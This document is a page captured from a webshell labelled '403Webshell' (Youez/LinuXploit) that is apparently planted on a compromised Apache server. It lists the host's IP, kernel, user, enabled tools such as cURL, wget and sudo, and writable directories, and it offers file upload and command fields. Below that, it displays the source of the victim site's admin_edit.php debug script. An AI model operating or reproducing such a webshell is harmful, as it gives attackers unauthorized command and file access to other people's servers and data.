403Webshell
Server IP : 173.209.174.21  /  Your IP : 216.73.216.89
Web Server : Apache/2.4.58 (Ubuntu)
System : Linux wcfs-server 6.8.0-124-generic #124-Ubuntu SMP PREEMPT_DYNAMIC Tue May 26 13:00:45 UTC 2026 x86_64
User : nodor ( 1000)
PHP Version : 8.3.6
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : OFF  |  Sudo : ON  |  Pkexec : OFF
Directory :  /var/www/vendorset/Vendorapp/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /var/www/vendorset/Vendorapp/admin_edit.php
<?php
error_reporting(E_ALL);
ini_set('display_errors', 1);

include 'config.php';
echo "Starting script...<br>";

// Check if ID is provided
if (isset($_GET['id']) && intval($_GET['id']) > 0) {
    $id = intval($_GET['id']);
    echo "Received ID: $id<br>";

    // Test database connection
    $conn = new mysqli(DB_HOST, DB_USER, DB_PASS, DB_NAME);
    if ($conn->connect_error) {
        die("Database connection failed: " . $conn->connect_error);
    }
    echo "Database connected successfully.<br>";

    // Test fetching data
    $stmt = $conn->prepare("SELECT username FROM admins WHERE id = ?");
    $stmt->bind_param("i", $id);
    $stmt->execute();
    $stmt->bind_result($username);
    if ($stmt->fetch()) {
        echo "User found: $username<br>";
    } else {
        echo "No user found with ID: $id<br>";
    }
    $stmt->close();
    $conn->close();
} else {
    echo "Invalid user ID.<br>";
}
?>

Youez - 2016 - github.com/yon3zu
LinuXploit